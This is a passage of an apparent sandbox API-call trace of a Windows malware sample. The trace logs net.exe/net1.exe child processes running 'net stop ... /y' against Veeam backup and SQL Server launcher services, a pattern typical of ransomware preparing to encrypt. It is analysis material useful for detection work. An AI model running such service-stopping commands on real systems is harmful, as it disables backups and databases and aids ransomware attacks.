AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 169 os_tid = 0x89c [0047.794] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x3ffd7c | out: lpSystemTimeAsFileTime=0x3ffd7c*(dwLowDateTime=0xe69da8a0, dwHighDateTime=0x1d57a86)) [0047.794] GetCurrentProcessId () returned 0x8a8 [0047.794] GetCurrentThreadId () returned 0x89c [0047.794] GetTickCount () returned 0x1146df0 [0047.794] QueryPerformanceCounter (in: lpPerformanceCount=0x3ffd74 | out: lpPerformanceCount=0x3ffd74*=16807870280) returned 1 [0047.794] GetModuleHandleA (lpModuleName=0x0) returned 0x150000 [0047.794] __set_app_type (_Type=0x1) [0047.794] __p__fmode () returned 0x74eb31f4 [0047.794] __p__commode () returned 0x74eb31fc [0047.795] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x15ffe6) returned 0x0 [0047.795] __getmainargs (in: _Argc=0x169064, _Argv=0x16906c, _Env=0x169068, _DoWildCard=0, _StartInfo=0x169024 | out: _Argc=0x169064, _Argv=0x16906c, _Env=0x169068) returned 0 [0047.795] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0047.795] GetConsoleOutputCP () returned 0x1b5 [0047.795] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x169080 | out: lpCPInfo=0x169080) returned 1 [0047.795] SetThreadUILanguage (LangId=0x0) returned 0x409 [0047.798] sprintf_s (in: _DstBuf=0x3ffd34, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0047.798] setlocale (category=0, locale=".437") returned="English_United States.437" [0047.800] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0047.800] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0047.800] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamBrokerSvc /y" [0047.800] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3ffb00, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0047.800] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x0, Size=0x70) returned 0x6d3c18 [0047.801] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0047.801] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x3ffd04 | out: Buffer=0x3ffd04*=0x6d1c78) returned 0x0 [0047.801] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x3ffd04 | out: Buffer=0x3ffd04*=0x6d1c90) returned 0x0 [0047.801] _fileno (_File=0x74eb2900) returned -2 [0047.801] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0047.801] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0047.801] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0047.801] _wcsicmp (_String1="config", _String2="stop") returned -16 [0047.801] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0047.801] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0047.801] _wcsicmp (_String1="file", _String2="stop") returned -13 [0047.801] _wcsicmp (_String1="files", _String2="stop") returned -13 [0047.801] _wcsicmp (_String1="group", _String2="stop") returned -12 [0047.801] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0047.801] _wcsicmp (_String1="help", _String2="stop") returned -11 [0047.801] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0047.801] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0047.801] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0047.801] _wcsicmp (_String1="session", _String2="stop") returned -15 [0047.801] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0047.801] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0047.801] _wcsicmp (_String1="share", _String2="stop") returned -12 [0047.801] _wcsicmp (_String1="start", _String2="stop") returned -14 [0047.801] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0047.801] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0047.802] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0047.802] _wcsicmp (_String1="accounts", _String2="VeeamBrokerSvc") returned -21 [0047.802] _wcsicmp (_String1="computer", _String2="VeeamBrokerSvc") returned -19 [0047.802] _wcsicmp (_String1="config", _String2="VeeamBrokerSvc") returned -19 [0047.802] _wcsicmp (_String1="continue", _String2="VeeamBrokerSvc") returned -19 [0047.802] _wcsicmp (_String1="cont", _String2="VeeamBrokerSvc") returned -19 [0047.802] _wcsicmp (_String1="file", _String2="VeeamBrokerSvc") returned -16 [0047.802] _wcsicmp (_String1="files", _String2="VeeamBrokerSvc") returned -16 [0047.802] _wcsicmp (_String1="group", _String2="VeeamBrokerSvc") returned -15 [0047.802] _wcsicmp (_String1="groups", _String2="VeeamBrokerSvc") returned -15 [0047.802] _wcsicmp (_String1="help", _String2="VeeamBrokerSvc") returned -14 [0047.802] _wcsicmp (_String1="helpmsg", _String2="VeeamBrokerSvc") returned -14 [0047.802] _wcsicmp (_String1="localgroup", _String2="VeeamBrokerSvc") returned -10 [0047.802] _wcsicmp (_String1="pause", _String2="VeeamBrokerSvc") returned -6 [0047.802] _wcsicmp (_String1="session", _String2="VeeamBrokerSvc") returned -3 [0047.802] _wcsicmp (_String1="sessions", _String2="VeeamBrokerSvc") returned -3 [0047.802] _wcsicmp (_String1="sess", _String2="VeeamBrokerSvc") returned -3 [0047.802] _wcsicmp (_String1="share", _String2="VeeamBrokerSvc") returned -3 [0047.802] _wcsicmp (_String1="start", _String2="VeeamBrokerSvc") returned -3 [0047.802] _wcsicmp (_String1="stats", _String2="VeeamBrokerSvc") returned -3 [0047.802] _wcsicmp (_String1="statistics", _String2="VeeamBrokerSvc") returned -3 [0047.802] _wcsicmp (_String1="stop", _String2="VeeamBrokerSvc") returned -3 [0047.802] _wcsicmp (_String1="time", _String2="VeeamBrokerSvc") returned -2 [0047.802] _wcsicmp (_String1="user", _String2="VeeamBrokerSvc") returned -1 [0047.802] _wcsicmp (_String1="users", _String2="VeeamBrokerSvc") returned -1 [0047.802] _wcsicmp (_String1="msg", _String2="VeeamBrokerSvc") returned -9 [0047.802] _wcsicmp (_String1="messenger", _String2="VeeamBrokerSvc") returned -9 [0047.802] _wcsicmp (_String1="receiver", _String2="VeeamBrokerSvc") returned -4 [0047.802] _wcsicmp (_String1="rcv", _String2="VeeamBrokerSvc") returned -4 [0047.802] _wcsicmp (_String1="netpopup", _String2="VeeamBrokerSvc") returned -8 [0047.802] _wcsicmp (_String1="redirector", _String2="VeeamBrokerSvc") returned -4 [0047.802] _wcsicmp (_String1="redir", _String2="VeeamBrokerSvc") returned -4 [0047.802] _wcsicmp (_String1="rdr", _String2="VeeamBrokerSvc") returned -4 [0047.802] _wcsicmp (_String1="workstation", _String2="VeeamBrokerSvc") returned 1 [0047.802] _wcsicmp (_String1="work", _String2="VeeamBrokerSvc") returned 1 [0047.802] _wcsicmp (_String1="wksta", _String2="VeeamBrokerSvc") returned 1 [0047.803] _wcsicmp (_String1="prdr", _String2="VeeamBrokerSvc") returned -6 [0047.803] _wcsicmp (_String1="devrdr", _String2="VeeamBrokerSvc") returned -18 [0047.803] _wcsicmp (_String1="lanmanworkstation", _String2="VeeamBrokerSvc") returned -10 [0047.803] _wcsicmp (_String1="server", _String2="VeeamBrokerSvc") returned -3 [0047.803] _wcsicmp (_String1="svr", _String2="VeeamBrokerSvc") returned -3 [0047.803] _wcsicmp (_String1="srv", _String2="VeeamBrokerSvc") returned -3 [0047.803] _wcsicmp (_String1="lanmanserver", _String2="VeeamBrokerSvc") returned -10 [0047.803] _wcsicmp (_String1="alerter", _String2="VeeamBrokerSvc") returned -21 [0047.803] _wcsicmp (_String1="netlogon", _String2="VeeamBrokerSvc") returned -8 [0047.803] _wcsupr (in: _String="VeeamBrokerSvc" | out: _String="VEEAMBROKERSVC") returned="VEEAMBROKERSVC" [0047.803] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x6d54d8 [0047.806] GetServiceKeyNameW (in: hSCManager=0x6d54d8, lpDisplayName="VEEAMBROKERSVC", lpServiceName=0x16aaf0, lpcchBuffer=0x3ffca0 | out: lpServiceName="", lpcchBuffer=0x3ffca0) returned 0 [0047.806] _wcsicmp (_String1="msg", _String2="VEEAMBROKERSVC") returned -9 [0047.806] _wcsicmp (_String1="messenger", _String2="VEEAMBROKERSVC") returned -9 [0047.806] _wcsicmp (_String1="receiver", _String2="VEEAMBROKERSVC") returned -4 [0047.806] _wcsicmp (_String1="rcv", _String2="VEEAMBROKERSVC") returned -4 [0047.806] _wcsicmp (_String1="redirector", _String2="VEEAMBROKERSVC") returned -4 [0047.806] _wcsicmp (_String1="redir", _String2="VEEAMBROKERSVC") returned -4 [0047.806] _wcsicmp (_String1="rdr", _String2="VEEAMBROKERSVC") returned -4 [0047.806] _wcsicmp (_String1="workstation", _String2="VEEAMBROKERSVC") returned 1 [0047.806] _wcsicmp (_String1="work", _String2="VEEAMBROKERSVC") returned 1 [0047.806] _wcsicmp (_String1="wksta", _String2="VEEAMBROKERSVC") returned 1 [0047.806] _wcsicmp (_String1="prdr", _String2="VEEAMBROKERSVC") returned -6 [0047.806] _wcsicmp (_String1="devrdr", _String2="VEEAMBROKERSVC") returned -18 [0047.807] _wcsicmp (_String1="lanmanworkstation", _String2="VEEAMBROKERSVC") returned -10 [0047.807] _wcsicmp (_String1="server", _String2="VEEAMBROKERSVC") returned -3 [0047.807] _wcsicmp (_String1="svr", _String2="VEEAMBROKERSVC") returned -3 [0047.807] _wcsicmp (_String1="srv", _String2="VEEAMBROKERSVC") returned -3 [0047.807] _wcsicmp (_String1="lanmanserver", _String2="VEEAMBROKERSVC") returned -10 [0047.807] _wcsicmp (_String1="alerter", _String2="VEEAMBROKERSVC") returned -21 [0047.807] _wcsicmp (_String1="netlogon", _String2="VEEAMBROKERSVC") returned -8 [0047.807] NetServiceControl (in: servername=0x0, service="VEEAMBROKERSVC", opcode=0x0, arg=0x0, bufptr=0x3ffc9c | out: bufptr=0x3ffc9c) returned 0x889 [0047.808] wcscpy_s (in: _Destination=0x16a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0047.808] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74710000 [0047.808] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74710000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x16b338, nSize=0x800, Arguments=0x169dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0047.809] GetFileType (hFile=0x26c) returned 0x3 [0047.809] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x6d4008 [0047.809] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x6d4008, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0047.809] WriteFile (in: hFile=0x26c, lpBuffer=0x6d4008*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x3ffbdc, lpOverlapped=0x0 | out: lpBuffer=0x6d4008*, lpNumberOfBytesWritten=0x3ffbdc*=0x1e, lpOverlapped=0x0) returned 1 [0047.810] LocalFree (hMem=0x6d4008) returned 0x0 [0047.810] GetFileType (hFile=0x26c) returned 0x3 [0047.810] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6d62b0 [0047.810] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x6d62b0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nm", lpUsedDefaultChar=0x0) returned 2 [0047.810] WriteFile (in: hFile=0x26c, lpBuffer=0x6d62b0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x3ffbdc, lpOverlapped=0x0 | out: lpBuffer=0x6d62b0*, lpNumberOfBytesWritten=0x3ffbdc*=0x2, lpOverlapped=0x0) returned 1 [0047.810] LocalFree (hMem=0x6d62b0) returned 0x0 [0047.810] _ultow (in: _Dest=0x889, _Radix=4193292 | out: _Dest=0x889) returned="2185" [0047.810] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74710000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x16b338, nSize=0x800, Arguments=0x169dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0047.810] GetFileType (hFile=0x26c) returned 0x3 [0047.810] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x6d62b0 [0047.810] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x6d62b0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0047.810] WriteFile (in: hFile=0x26c, lpBuffer=0x6d62b0*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x3ffbe8, lpOverlapped=0x0 | out: lpBuffer=0x6d62b0*, lpNumberOfBytesWritten=0x3ffbe8*=0x34, lpOverlapped=0x0) returned 1 [0047.810] LocalFree (hMem=0x6d62b0) returned 0x0 [0047.810] GetFileType (hFile=0x26c) returned 0x3 [0047.810] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6d62b0 [0047.810] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x6d62b0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nm", lpUsedDefaultChar=0x0) returned 2 [0047.810] WriteFile (in: hFile=0x26c, lpBuffer=0x6d62b0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x3ffbe8, lpOverlapped=0x0 | out: lpBuffer=0x6d62b0*, lpNumberOfBytesWritten=0x3ffbe8*=0x2, lpOverlapped=0x0) returned 1 [0047.810] LocalFree (hMem=0x6d62b0) returned 0x0 [0047.811] NetApiBufferFree (Buffer=0x6d1c78) returned 0x0 [0047.811] NetApiBufferFree (Buffer=0x6d1c90) returned 0x0 [0047.811] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamBrokerSvc /y" [0047.811] exit (_Code=2) Process: id = "102" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x455d2000" os_pid = "0xa14" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop MSSQLFDLauncher$PROFXENGAGEMENT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 170 os_tid = 0xa08 Process: id = "103" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x46292000" os_pid = "0xa0c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "102" os_parent_pid = "0xa14" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 171 os_tid = 0xa00 [0047.939] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1fff54 | out: lpSystemTimeAsFileTime=0x1fff54*(dwLowDateTime=0xe6b31500, dwHighDateTime=0x1d57a86)) [0047.939] GetCurrentProcessId () returned 0xa0c [0047.939] GetCurrentThreadId () returned 0xa00 [0047.939] GetTickCount () returned 0x1146e7c [0047.939] QueryPerformanceCounter (in: lpPerformanceCount=0x1fff4c | out: lpPerformanceCount=0x1fff4c*=16822404328) returned 1 [0047.940] GetModuleHandleA (lpModuleName=0x0) returned 0x550000 [0047.940] __set_app_type (_Type=0x1) [0047.940] __p__fmode () returned 0x74eb31f4 [0047.940] __p__commode () returned 0x74eb31fc [0047.940] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x55ffe6) returned 0x0 [0047.940] __getmainargs (in: _Argc=0x569064, _Argv=0x56906c, _Env=0x569068, _DoWildCard=0, _StartInfo=0x569024 | out: _Argc=0x569064, _Argv=0x56906c, _Env=0x569068) returned 0 [0047.940] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0047.940] GetConsoleOutputCP () returned 0x1b5 [0047.942] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x569080 | out: lpCPInfo=0x569080) returned 1 [0047.943] SetThreadUILanguage (LangId=0x0) returned 0x409 [0047.946] sprintf_s (in: _DstBuf=0x1fff0c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0047.946] setlocale (category=0, locale=".437") returned="English_United States.437" [0047.948] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0047.948] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0047.948] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y" [0047.948] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1ffcd8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0047.948] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x92) returned 0x753c48 [0047.948] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0047.948] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1ffedc | out: Buffer=0x1ffedc*=0x751ca8) returned 0x0 [0047.948] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1ffedc | out: Buffer=0x1ffedc*=0x751cc0) returned 0x0 [0047.948] _fileno (_File=0x74eb2900) returned -2 [0047.948] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0047.948] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0047.948] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0047.948] _wcsicmp (_String1="config", _String2="stop") returned -16 [0047.948] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0047.948] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0047.948] _wcsicmp (_String1="file", _String2="stop") returned -13 [0047.948] _wcsicmp (_String1="files", _String2="stop") returned -13 [0047.948] _wcsicmp (_String1="group", _String2="stop") returned -12 [0047.948] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0047.948] _wcsicmp (_String1="help", _String2="stop") returned -11 [0047.948] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0047.949] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0047.949] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0047.949] _wcsicmp (_String1="session", _String2="stop") returned -15 [0047.949] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0047.949] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0047.949] _wcsicmp (_String1="share", _String2="stop") returned -12 [0047.949] _wcsicmp (_String1="start", _String2="stop") returned -14 [0047.949] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0047.949] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0047.949] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0047.949] _wcsicmp (_String1="accounts", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -12 [0047.949] _wcsicmp (_String1="computer", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -10 [0047.949] _wcsicmp (_String1="config", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -10 [0047.949] _wcsicmp (_String1="continue", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -10 [0047.949] _wcsicmp (_String1="cont", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -10 [0047.949] _wcsicmp (_String1="file", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -7 [0047.949] _wcsicmp (_String1="files", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -7 [0047.949] _wcsicmp (_String1="group", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -6 [0047.949] _wcsicmp (_String1="groups", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -6 [0047.949] _wcsicmp (_String1="help", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -5 [0047.949] _wcsicmp (_String1="helpmsg", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -5 [0047.949] _wcsicmp (_String1="localgroup", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -1 [0047.949] _wcsicmp (_String1="pause", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 3 [0047.949] _wcsicmp (_String1="session", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 6 [0047.949] _wcsicmp (_String1="sessions", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 6 [0047.949] _wcsicmp (_String1="sess", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 6 [0047.949] _wcsicmp (_String1="share", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 6 [0047.949] _wcsicmp (_String1="start", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 6 [0047.949] _wcsicmp (_String1="stats", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 6 [0047.949] _wcsicmp (_String1="statistics", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 6 [0047.949] _wcsicmp (_String1="stop", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 6 [0047.949] _wcsicmp (_String1="time", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 7 [0047.949] _wcsicmp (_String1="user", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 8 [0047.949] _wcsicmp (_String1="users", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 8 [0047.949] _wcsicmp (_String1="msg", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -12 [0047.949] _wcsicmp (_String1="messenger", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -14 [0047.950] _wcsicmp (_String1="receiver", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 5 [0047.950] _wcsicmp (_String1="rcv", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 5 [0047.950] _wcsicmp (_String1="netpopup", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 1 [0047.950] _wcsicmp (_String1="redirector", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 5 [0047.950] _wcsicmp (_String1="redir", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 5 [0047.950] _wcsicmp (_String1="rdr", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 5 [0047.950] _wcsicmp (_String1="workstation", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 10 [0047.950] _wcsicmp (_String1="work", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 10 [0047.950] _wcsicmp (_String1="wksta", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 10 [0047.950] _wcsicmp (_String1="prdr", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 3 [0047.950] _wcsicmp (_String1="devrdr", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -9 [0047.950] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -1 [0047.950] _wcsicmp (_String1="server", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 6 [0047.950] _wcsicmp (_String1="svr", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 6 [0047.950] _wcsicmp (_String1="srv", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 6 [0047.950] _wcsicmp (_String1="lanmanserver", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -1 [0047.950] _wcsicmp (_String1="alerter", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned -12 [0047.950] _wcsicmp (_String1="netlogon", _String2="MSSQLFDLauncher$PROFXENGAGEMENT") returned 1 [0047.950] _wcsupr (in: _String="MSSQLFDLauncher$PROFXENGAGEMENT" | out: _String="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned="MSSQLFDLAUNCHER$PROFXENGAGEMENT" [0047.950] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x755530 [0047.953] GetServiceKeyNameW (in: hSCManager=0x755530, lpDisplayName="MSSQLFDLAUNCHER$PROFXENGAGEMENT", lpServiceName=0x56aaf0, lpcchBuffer=0x1ffe78 | out: lpServiceName="", lpcchBuffer=0x1ffe78) returned 0 [0047.954] _wcsicmp (_String1="msg", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned -12 [0047.954] _wcsicmp (_String1="messenger", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned -14 [0047.954] _wcsicmp (_String1="receiver", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned 5 [0047.954] _wcsicmp (_String1="rcv", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned 5 [0047.954] _wcsicmp (_String1="redirector", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned 5 [0047.954] _wcsicmp (_String1="redir", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned 5 [0047.954] _wcsicmp (_String1="rdr", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned 5 [0047.954] _wcsicmp (_String1="workstation", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned 10 [0047.954] _wcsicmp (_String1="work", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned 10 [0047.954] _wcsicmp (_String1="wksta", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned 10 [0047.954] _wcsicmp (_String1="prdr", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned 3 [0047.954] _wcsicmp (_String1="devrdr", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned -9 [0047.954] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned -1 [0047.954] _wcsicmp (_String1="server", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned 6 [0047.954] _wcsicmp (_String1="svr", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned 6 [0047.954] _wcsicmp (_String1="srv", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned 6 [0047.954] _wcsicmp (_String1="lanmanserver", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned -1 [0047.954] _wcsicmp (_String1="alerter", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned -12 [0047.954] _wcsicmp (_String1="netlogon", _String2="MSSQLFDLAUNCHER$PROFXENGAGEMENT") returned 1 [0047.954] NetServiceControl (in: servername=0x0, service="MSSQLFDLAUNCHER$PROFXENGAGEMENT", opcode=0x0, arg=0x0, bufptr=0x1ffe74 | out: bufptr=0x1ffe74) returned 0x889 [0047.955] wcscpy_s (in: _Destination=0x56a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0047.955] LoadLibraryW (lpLibFileName="NETMSG") returned 0x747a0000 [0047.955] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x747a0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x56b338, nSize=0x800, Arguments=0x569dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0047.957] GetFileType (hFile=0x26c) returned 0x3 [0047.957] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x754060 [0047.957] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x754060, cbMultiByte=60, lpDefaultChar=0x0, 